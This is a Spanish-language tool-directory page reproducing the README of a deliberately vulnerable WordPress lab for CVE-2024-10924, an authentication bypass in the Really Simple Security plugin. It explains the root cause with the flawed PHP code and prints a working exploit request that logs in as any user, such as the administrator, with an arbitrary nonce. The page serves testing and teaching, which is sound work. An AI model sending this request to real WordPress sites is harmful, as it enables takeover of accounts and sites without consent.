Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
wordpress-really-simple-security-authn-bypass-vulnerable-application — ADVERTENCIA: Esta es una aplicación vulnerable para probar el exploit de la omisión de autenticación de Really Simple Security < 9.1.2 (CVE-2024-10924). ¡Ejecútala bajo tu propio riesgo! | Kitploit
Herramientas/GitHubGitHub/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónLabs y Práctica
GitHubm3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application

wordpress-really-simple-security-authn-bypass-vulnerable-application

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ADVERTENCIA: Esta es una aplicación vulnerable para probar el exploit de la omisión de autenticación de Really Simple Security < 9.1.2 (CVE-2024-10924). ¡Ejecútala bajo tu propio riesgo!

Ver Repositorio
8hace 1 añoAún no revisado

wordpress-really-simple-security-authn-bypass-vulnerable-application

Esta es una aplicación vulnerable para probar el exploit de la omisión de autenticación de Really Simple Security < 9.1.2 (CVE-2024-10924).

¡ADVERTENCIA!

Esta aplicación contiene vulnerabilidades de seguridad graves. ¡Úsala bajo tu propio riesgo! Se recomienda utilizar un entorno respaldado y aislado (como una máquina virtual con una instantánea reciente y red solo-anfitrión). No subas esta aplicación a servidores expuestos a Internet, ya que se verán comprometidos.

DESCARGO DE RESPONSABILIDAD: No me hago responsable de la forma en que cualquiera use esta aplicación. El único propósito de esta aplicación es ser un escenario de prueba para el exploit de omisión de autenticación de Really Simple Security < 9.1.2 (CVE-2024-10924) y no debe utilizarse de forma malintencionada. Si tu servidor se ve comprometido mediante una instalación de esta aplicación, no es mi responsabilidad, sino de la(s) persona(s) que la subieron e instalaron.

Información de la vulnerabilidad

  • CVE-ID: CVE-2024-10924
  • Link: https://www.cve.org/CVERecord?id=CVE-2024-10924
  • Descripción: Esto permite que atacantes no autenticados inicien sesión como cualquier usuario existente en el sitio, como un administrador, cuando el ajuste "Two-Factor Authentication" está habilitado (deshabilitado por defecto).
  • Solución: https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
  • Boletín de Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass

Uso

Estos son los pasos para configurar el entorno:

  1. Ejecuta ./up.sh para iniciar la composición.
  2. Completa la instalación de WordPress aquí: https://localhost:1337/wp-admin/install.php.
  3. Inicia sesión en WordPress.
  4. Ve a "Plugins": https://localhost:1337/wp-admin/plugins.php.
  5. Haz clic en "Activate" bajo el plugin "Really Simple Security". NO LO ACTUALICES, ya que necesitamos la versión vulnerable.
  6. Haz clic en "Cancel" en la ventana emergente referente a la activación de SSL.
  7. Ve a "Settings" > "Login Protection" > "Two-Factor Authentication" y, en la sección "Two-Factor Authentication", habilita "Enable Two-Factor Authentication".
  8. Haz clic en el botón "Save".

El contenedor se llamará vuln-wp-really-simple-security.

Para desmontar el entorno usa el comando ./down.sh o el comando ./down_and_delete.sh para eliminar también las imágenes y el volumen de la base de datos.

Causa raíz

Al observar la solución, es posible entender que en la versión vulnerable la función check_login_and_get_user() devolvía un objeto de error, en caso de un nonce de inicio de sesión no válido, sin abortar toda la operación.

root@kitploit:~
private function check_login_and_get_user( int $user_id, string $login_nonce ) {
    if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
        return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
    }

    /**
     * Get the user by the user ID.
     *
     * @var WP_User $user
     */
    $user = get_user_by( 'id', $user_id );
    return $user;
}

En el llamador, por cierto, no se realizaba ninguna comprobación sobre la salida de la función check_login_and_get_user() (línea 277), sino que simplemente se continuaba con la función authenticate_and_redirect() (línea 278) usando el mismo valor recibido de la entrada para el ID de usuario.

root@kitploit:~
public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
	$parameters = new Rsssl_Request_Parameters( $request );
	// As a double we check the user_id with the login nonce.
	$user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
	return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
}

Exploit

Para explotar la vulnerabilidad, basta una petición como la siguiente.

root@kitploit:~
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: localhost:1337
Content-Type: application/json
Content-Length: 88
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

Luego, configura las cookies de sesión devueltas en el navegador.

El user_id debe ser el ID del usuario objetivo; el login_nonce puede ser cualquier valor, ya que un valor incorrecto no bloqueará el proceso.

Se puede encontrar un script de exploit en Python aquí.

Autores

  • Antonio Francesco Sardella - implementación - m3ssap0

Licencia

Este proyecto está licenciado bajo la Unlicense; consulta el archivo LICENSE para más detalles.

Agradecimientos

  • István Márton, el investigador de seguridad que descubrió la vulnerabilidad.
Descargar herramienta